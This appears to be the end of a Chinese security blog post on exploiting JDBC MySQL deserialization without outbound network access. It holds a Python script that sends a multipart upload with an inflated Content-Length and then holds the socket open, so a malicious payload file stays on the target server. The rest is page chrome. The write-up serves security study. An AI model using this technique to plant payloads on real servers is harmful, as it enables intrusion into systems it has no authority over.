<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket  </span><br><span class="line"><span class="keyword">import</span> time  </span><br><span class="line">  </span><br><span class="line">payload_path = <span class="string">r&quot;path_to_payload&quot;</span>  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(payload_path, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:  </span><br><span class="line">    payload = f.read()  </span><br><span class="line">  </span><br><span class="line">req = <span class="string">b&#x27;&#x27;&#x27;POST / HTTP/1.1  </span></span><br><span class="line"><span class="string">Host: localhost  </span></span><br><span class="line"><span class="string">Accept-Encoding: gzip, deflate  </span></span><br><span class="line"><span class="string">Accept: */*  </span></span><br><span class="line"><span class="string">Content-Type: multipart/form-data; boundary=xxxxxxxx  </span></span><br><span class="line"><span class="string">User-Agent: python-requests/2.32.3  </span></span><br><span class="line"><span class="string">Content-Length: 999999  </span></span><br><span class="line"><span class="string">  </span></span><br><span class="line"><span class="string">--xxxxxxxx  </span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;tmp.txt&quot;  </span></span><br><span class="line"><span class="string">  </span></span><br><span class="line"><span class="string">&#123;&#123;payload&#125;&#125;  </span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>.replace(<span class="string">b&quot;\n&quot;</span>, <span class="string">b&quot;\r\n&quot;</span>).replace(<span class="string">b&quot;&#123;&#123;payload&#125;&#125;&quot;</span>, payload)  </span><br><span class="line">skt = socket.socket()  </span><br><span class="line">skt.connect((<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">8085</span>))  </span><br><span class="line">skt.sendall(req)  </span><br><span class="line">time.sleep(<span class="number">999</span>)</span><br></pre></td></tr></table></figure></div>

<p>这样在没有heapdump泄露的情况下也能完成攻击,对于需要本地文件的攻击也都可以试试这个思路</p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> JDBC-Mysql反序列化不出网利用</li>
        <li><strong>Author:</strong> mapl3miss</li>
        <li><strong>Created at
                :</strong> 2025-09-19 12:22:07</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2026-01-02 23:24:13
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2025/09/19/JDBC-Mysql反序列化不出网利用/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/javaSec/">#javaSec</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/09/19/Fastjson1-2-83-mysql%E5%88%A9%E7%94%A8-%E5%BC%80%E5%90%AFautotype/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">Fastjson1.2.83 + mysql利用(开启autotype)</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2025/09/19/JDBC-mysql%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">JDBC mysql任意文件读取漏洞</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">JDBC-Mysql反序列化不出网利用</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#socketFactory%E5%B1%9E%E6%80%A7"><span class="nav-text">socketFactory属性</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-text">利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0%E6%81%B6%E6%84%8F%E6%95%B0%E6%8D%AE%E6%96%87%E4%BB%B6%E5%88%B0%E7%9B%AE%E6%A0%87%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-text">上传恶意数据文件到目标服务器</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E5%86%B3%E8%87%AA%E5%8A%A8%E5%88%A0%E9%99%A4%E9%97%AE%E9%A2%98"><span class="nav-text">解决自动删除问题:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E5%86%B3%E6%96%87%E4%BB%B6%E4%BD%8D%E7%BD%AE%E9%97%AE%E9%A2%98"><span class="nav-text">解决文件位置问题:</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">mapl3miss</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        8 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="Search..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>